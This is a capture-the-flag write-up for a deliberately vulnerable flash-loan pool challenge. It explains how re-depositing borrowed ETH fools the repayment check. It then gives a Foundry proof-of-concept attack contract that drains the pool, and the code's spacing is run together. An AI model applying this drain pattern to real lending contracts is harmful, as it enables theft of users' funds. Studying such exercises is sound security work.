A surprisingly simple pool allows anyone to deposit ETH, and withdraw it at any point in time.
It has 1000 ETH in balance already, and is offering free flash loans using the deposited ETH to promote their system.
Starting with 1 ETH in balance, pass the challenge by taking all ETH from the pool.
We can borrow flashloan and immediately deposit the money you just borrowed into the same contract. By doing so, the invariant in flashLoan() is bypassed and we can withdraw balance later.
At IFlashLoanEtherReceiver(msg.sender).execute{value: amount}() we can call flashLoan() to borrow all the fund in this pool. Next we have to find out a way to bypass the check:
if (address(this).balance < balanceBefore)revertRepayFailed();
This check can be bypassed by calling deposit() once we receive the flash loan. The attack steps:
The attack contract's pwn() function calls flashLoan() to borrow all the fund in the pool. In this step IFlashLoanEtherReceiver(msg.sender).execute{value: amount}() will be called.
In attack contract's execute() function call deposit() to deposit the flash loan we just borrowed. At this stage the if (address(this).balance < balanceBefore) check will be bypassed because the borrowed money was deposited into the same contract, therefore address(this).balance == balanceBefore.
When flashLoan() finishes executing, call withdraw() to take all the money out.
Building PoC
// SPDX-License-Identifier: MITpragmasolidity >=0.8.0;import {Utilities} from"../../utils/Utilities.sol";import"forge-std/Test.sol";import {SideEntranceLenderPool} from"../../../src/Contracts/side-entrance/SideEntranceLenderPool.sol";contractSideEntranceisTest {uint256internalconstant ETHER_IN_POOL =1_000e18; Utilities internal utils; SideEntranceLenderPool internal sideEntranceLenderPool;addresspayableinternal attacker;uint256public attackerInitialEthBalance;functionsetUp() public { utils =newUtilities();addresspayable[] memory users = utils.createUsers(1); attacker = users[0]; vm.label(attacker,"Attacker"); sideEntranceLenderPool =newSideEntranceLenderPool(); vm.label(address(sideEntranceLenderPool),"Side Entrance Lender Pool"); vm.deal(address(sideEntranceLenderPool), ETHER_IN_POOL);assertEq(address(sideEntranceLenderPool).balance, ETHER_IN_POOL); attackerInitialEthBalance =address(attacker).balance; console.log(unicode"🧨 Let's see if you can break it... 🧨"); }functiontestExploit() public {/** * EXPLOIT START * */ vm.startPrank(attacker); FlashLoanEtherReceiver flashLoanEtherReceiver =newFlashLoanEtherReceiver(sideEntranceLenderPool); flashLoanEtherReceiver.pwn(); vm.stopPrank();/** * EXPLOIT END * */validation(); console.log(unicode"\n🎉 Congratulations, you can go to the next level! 🎉"); }functionvalidation() internal {assertEq(address(sideEntranceLenderPool).balance,0);assertGt(attacker.balance, attackerInitialEthBalance); }}contract FlashLoanEtherReceiver { SideEntranceLenderPool sideEntranceLenderPool;address owner;constructor(SideEntranceLenderPool_sideEntranceLenderPool) { owner = msg.sender; sideEntranceLenderPool = _sideEntranceLenderPool; }functionexecute() externalpayable {require(msg.sender ==address(sideEntranceLenderPool),"only pool can call this function"); sideEntranceLenderPool.deposit{value: msg.value}(); }functionpwn() external {require(msg.sender == owner,"only owner can call this function"); sideEntranceLenderPool.flashLoan(address(sideEntranceLenderPool).balance);// We have deposited all the flashloan we borrowed inside execute(),// so we have lots of balance at this stage sideEntranceLenderPool.withdraw();payable(owner).transfer(address(this).balance); }receive () externalpayable {}}